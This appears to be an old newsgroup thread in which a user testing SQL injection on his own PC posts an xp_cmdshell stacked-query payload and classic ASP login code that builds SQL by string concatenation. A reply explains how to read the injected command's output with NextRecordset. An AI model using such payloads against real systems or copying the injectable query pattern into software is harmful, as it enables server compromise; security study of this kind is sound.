Is this default behavior?

Hello all,
I'm having difficulties understanding why something is not going the way I
want it (sounds familiar?). I'm testing SQL injection on my own PC, based on
the article at http://aspalliance.com/articleViewe...aId=385&pId=-1.
when I enter only my credentials in the user field, like
administrator';use master exec xp_cmdshell 'dir c:\*.*'--
I get the resultant string
SELECT strusername, strpassword FROM tUser WHERE strusername = 'beheerder';
use master exec xp_cmdshell 'dir c:\*.*' --' AND strpassword = ''
Now the output of "Response.write objrso.Fields.count" is 2. A closer look
gives me 'administrator' and 'password'. Not the C:\ drive listing, which
does show up in SQL Query Analyzer! Is this by any means possible with the
code
Set objConn = Server.CreateObject("ADODB.Connection")
Set objrso = Server.CreateObject("ADODB.Recordset")
sql = "SELECT strusername, strpassword FROM tUser WHERE strusername = '" +
username & _
"' AND strpassword = '" + password & _
"'"
objConn.Open cn
objrso.open sql, cn
If not, how should I change this code? Any hints would be highly welcome.
Best regards,
Carl.Hi Carl,
Since you have two different SQL statements, separated by semicolon, then
provider executes them separately and returns two resultsets (recordsets).
When you open objrso recordset, then it points to the first one. To be able
to get information from the subsequent recordsets, you need to call
NextRecordset method of the opened recordset
Set objrso=objrso.NextRecordset
If provider returns another resultset, then you will see it after this call
Val Mazur
Microsoft MVP
"Carl Matthews" <ecvaneersel@.nospam.hotmail.com> wrote in message
news:ecJmrkjIEHA.1140@.tk2msftngp13.phx.gbl...
> Hello all,
> I'm having difficulties understanding why something is not going the way I
> want it (sounds familiar?). I'm testing SQL injection on my own PC, based
> on
> the article at http://aspalliance.com/articleViewe...aId=385&pId=-1.
> when I enter only my credentials in the user field, like
> administrator';use master exec xp_cmdshell 'dir c:\*.*'--
> I get the resultant string
> SELECT strusername, strpassword FROM tUser WHERE strusername =
> 'beheerder';
> use master exec xp_cmdshell 'dir c:\*.*' --' AND strpassword = ''
>
> Now the output of "Response.write objrso.Fields.count" is 2. A closer look
> gives me 'administrator' and 'password'. Not the C:\ drive listing, which
> does show up in SQL Query Analyzer! Is this by any means possible with the
> code
> Set objConn = Server.CreateObject("ADODB.Connection")
> Set objrso = Server.CreateObject("ADODB.Recordset")
> sql = "SELECT strusername, strpassword FROM tUser WHERE strusername = '" +
> username & _
> "' AND strpassword = '" + password & _
> "'"
> objConn.Open cn
> objrso.open sql, cn
> If not, how should I change this code? Any hints would be highly welcome.
> Best regards,
> Carl.
>sql